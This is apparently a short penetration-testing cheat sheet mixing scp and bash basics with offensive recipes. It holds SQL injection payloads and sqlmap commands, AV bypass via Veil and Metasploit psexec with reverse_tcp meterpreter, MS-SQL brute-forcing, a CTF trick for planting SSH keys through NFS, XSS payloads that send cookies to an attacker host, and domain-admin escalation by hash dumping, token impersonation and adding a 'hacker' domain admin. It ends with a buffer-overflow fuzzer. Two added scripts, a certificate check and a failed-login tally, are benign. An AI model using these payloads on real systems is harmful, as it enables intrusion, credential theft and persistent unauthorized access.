CheatSheet (Short)

SCP

[+] Secure Copy (scp) Cheatsheet
--------------------------------
[>] Copy remote file to local host:
$ scp your_username@ip:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> your_username@192.168.0.10:/some/remote/directory
[>] Copy local directory to remote directory:
$ scp -r <local_dir> your_username@ip:/some/remote/directory/<remote_dir>
[>] Copy a file from one remote host to another:
$ scp your_username@<host1>:/some/remote/directory/foobar.txt your_username@<host2>:/some/remote/directory/
[>] Improve scp performance by choosing a faster cipher (blowfish here; OpenSSH 7.6 and later no longer ship it, so on current clients pick one listed by ssh -Q cipher):
$ scp -c blowfish <local_file> your_username@ip:/some/remote/directory

SQL Injection

[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.
2. In msfconsole set up psexec with the relevant payload (windows/meterpreter/reverse_tcp)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

# Enabling self-signed certificates on a local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self-signed SSL certificate and key:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Enable the default-ssl site by creating a symbolic link
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
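A few post-install checks, added here as an example and not part of the original cheat sheet or the linked guides: they confirm that the certificate and key from step 2 belong together, report the expiry date, and flag that the certificate is self-signed. Paths default to the ones used above, and the openssl CLI is assumed to be installed.

```shell
#!/bin/bash
# Added example, not from the original cheat sheet: checks to run on the
# files produced in step 2 before restarting Apache in step 6. Paths default
# to the ones used above; pass others as arguments. Requires the openssl CLI.

# 0 when certificate and key share one RSA modulus (they belong together);
# Apache refuses to start, or serves the wrong cert, when they do not.
check_cert_key() {
    local crt="$1" key="$2" crt_mod key_mod
    crt_mod=$(openssl x509 -in "$crt" -noout -modulus) || return 2
    key_mod=$(openssl rsa -in "$key" -noout -modulus 2>/dev/null) || return 2
    [ "$crt_mod" = "$key_mod" ]
}

# Prints the notAfter date; returns 1 when the cert expires within <days>
# (default 30), so a cron job can warn before the page's 1095 days run out.
check_expiry() {
    local crt="$1" days="${2:-30}"
    openssl x509 -in "$crt" -noout -enddate
    openssl x509 -in "$crt" -noout -checkend $((days * 86400)) >/dev/null
}

# 0 when issuer equals subject, i.e. self-signed: expected for this local
# setup, but browsers will warn until the cert is imported or replaced.
is_self_signed() {
    local crt="$1" subj iss
    subj=$(openssl x509 -in "$crt" -noout -subject)
    iss=$(openssl x509 -in "$crt" -noout -issuer)
    [ "${subj#subject=}" = "${iss#issuer=}" ]
}

# Runs all three checks and prints a one-line verdict each; always returns 0.
report_cert() {
    local crt="${1:-/etc/ssl/certs/server.crt}" key="${2:-/etc/ssl/private/server.key}"
    if check_cert_key "$crt" "$key"; then echo "cert/key pair: OK"; else echo "cert/key pair: MISMATCH"; fi
    if check_expiry "$crt" >/dev/null; then echo "expiry: OK"; else echo "expiry: renew soon"; fi
    if is_self_signed "$crt"; then echo "self-signed: yes, browser warnings expected"; fi
}
```

Run `report_cert` with no arguments on the server after step 2; a MISMATCH verdict is the usual cause of Apache failing to start after step 6.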
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

Attacking MS-SQL

[+] Attacking MSSQL with Metasploit
[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Bash Scripting

Simple Bash Scripting Cheatsheet
--------------------------------
[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.
[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp Redirect the output of a command into a file (overwrites it).
nano file
[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
[+] How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
[+] Processes
ps aux Show all running process for all users.
kill -9 PID Forcibly kill a process by PID (SIGKILL, cannot be caught); plain kill PID sends SIGTERM and lets it exit cleanly.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] cut
-d delimiter
-f fields
[+] sort
sort -u file Sort and remove duplicate lines.
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n file Sort IP addresses numerically, octet by octet.
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
[+] grep
grep -v 'red' file Exclude lines containing a single string.
[+] egrep -v
egrep -v '(red|white|blue)' file Exclude lines containing any of several strings.
[+] sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
Bash Scripts
------------
[+] Simple bash script:
#!/bin/bash
clear
echo
echo
echo "Hello world."
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip
[+] User Input
read -p "Domain: " domain
#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
[+] Check For No User Input
if [ -z "$domain" ]; then
    echo
    echo "#########################"
    echo
    echo "Invalid choice."
    echo
    exit
fi
[+] For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
    command $host
done
[+] One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done
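The pieces above (grep, cut, the octet-wise sort, awk, the -z input check and the for loop) combined into one defensive script, as an added example that is not from the original cheat sheet: it tallies failed SSH logins per source IP from a constructed auth.log sample; a real run would pass /var/log/auth.log.

```shell
#!/bin/bash
# Added example, not from the original cheat sheet: the grep/cut/sort/awk
# recipes above combined into a failed-login triage script. Log lines are
# constructed for the demo; in practice pass /var/log/auth.log instead.

# Writes a few constructed sshd lines to a temp file and prints its path.
make_sample_log() {
    local f; f=$(mktemp)
    cat > "$f" <<'EOF'
Mar  1 10:00:01 host sshd[1234]: Failed password for root from 10.0.0.5 port 51234 ssh2
Mar  1 10:00:02 host sshd[1235]: Failed password for invalid user admin from 192.168.1.20 port 51235 ssh2
Mar  1 10:00:03 host sshd[1236]: Accepted publickey for bob from 10.0.0.9 port 51236 ssh2
Mar  1 10:00:04 host sshd[1237]: Failed password for root from 10.0.0.5 port 51237 ssh2
Mar  1 10:00:05 host sshd[1238]: Failed password for root from 10.0.0.5 port 51238 ssh2
Mar  1 10:00:06 host sshd[1239]: Failed password for root from 10.0.0.5 port 51239 ssh2
Mar  1 10:00:07 host sshd[1240]: Failed password for invalid user test from 10.0.0.12 port 51240 ssh2
EOF
    echo "$f"
}

# Every failed-login source IP once, in numeric octet order (the
# "sort IP addresses correct" one-liner from the sort section).
failed_login_ips() {
    grep "Failed password" "$1" | grep -o 'from [0-9.]*' | cut -d ' ' -f2 \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# "<count> <ip>" per source, busiest first; awk keeps the tally.
failed_login_counts() {
    grep "Failed password" "$1" | grep -o 'from [0-9.]*' \
        | awk '{n[$2]++} END {for (ip in n) print n[ip], ip}' | sort -rn
}

# IPs with more than <limit> failures (default 3). The -z test mirrors the
# "Check For No User Input" section: an empty path is rejected, not grepped.
noisy_ips() {
    local file="$1" limit="${2:-3}"
    if [ -z "$file" ]; then echo "usage: noisy_ips <logfile> [limit]" >&2; return 1; fi
    failed_login_counts "$file" | awk -v lim="$limit" '$1 > lim {print $2}'
}

# Demo, run with --demo: the for loop from the "For loops" section.
if [ "${1:-}" = "--demo" ]; then
    log=$(make_sample_log)
    failed_login_counts "$log"
    for ip in $(noisy_ips "$log"); do echo "review $ip"; done
    rm -f "$log"
fi
```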

CTF CS

CTF Notes
---------
# Enumerate Users via Finger
finger user@ip
# Show nfs shares available
showmount -e ip
# Use nfspysh to mount the share and create a .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh
# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys
# Transfer attacker public key to host
put /tmp/authorized_keys
exit
# Login to SSH server with no password
SSH_AUTH_SOCK=0 ssh user@ip

Cookie Stealing

[+] Cookie Stealing:
[-] Start Web Service
python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:
<script>document.location="http://ip/?c="+document.cookie;</script>
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>

Domain Admin Exploitation

[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run
msf > spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit-Dev

Exploit Development Cheatsheet
------------------------------
[+] Fuzzing:
import socket

# Each entry is 50 bytes longer than the previous one
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

# Send each payload on a fresh connection; the last length printed before
# the service stops responding is the approximate crash length
for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.0.20", 5555))
    sock.send(buffstring.encode())
    sock.close()
[+] Bad Character Testing:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwrite (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump over SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Pad the payload back to its original length so the crash still triggers.